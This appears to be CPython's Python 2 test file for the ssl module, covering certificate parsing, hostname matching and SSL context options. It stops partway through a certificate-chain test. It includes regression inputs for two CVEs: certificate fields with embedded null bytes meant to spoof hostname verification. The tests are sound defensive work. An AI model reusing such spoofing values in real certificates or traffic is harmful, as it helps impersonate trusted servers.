# test_ssl.py
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
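# Illustrative sketch (not part of the original suite): handle_error() formats
# the exception currently being handled via sys.exc_info(), so it is only
# meaningful inside an ``except`` block, the way the echo servers below use it:
#
#     try:
#         risky_operation()          # hypothetical callable
#     except Exception:
#         handle_error("example: ")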
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError as e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError as e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
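# Illustrative usage (mirrors ContextTests below): the decorator wraps
# individual test methods and only intervenes when this build of the ssl
# module still exposes PROTOCOL_SSLv2, e.g.
#
#     @skip_if_broken_ubuntu_ssl
#     def test_constructor(self):
#         for protocol in PROTOCOLS:
#             ssl.SSLContext(protocol)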
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
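# Note: get_default_verify_paths() returns a DefaultVerifyPaths named tuple
# with six fields (cafile and capath plus the OpenSSL environment variable
# names and their compiled-in defaults); cafile/capath honour the
# SSL_CERT_FILE and SSL_CERT_DIR environment variables, which is what the
# EnvironmentVarGuard block above relies on.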
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
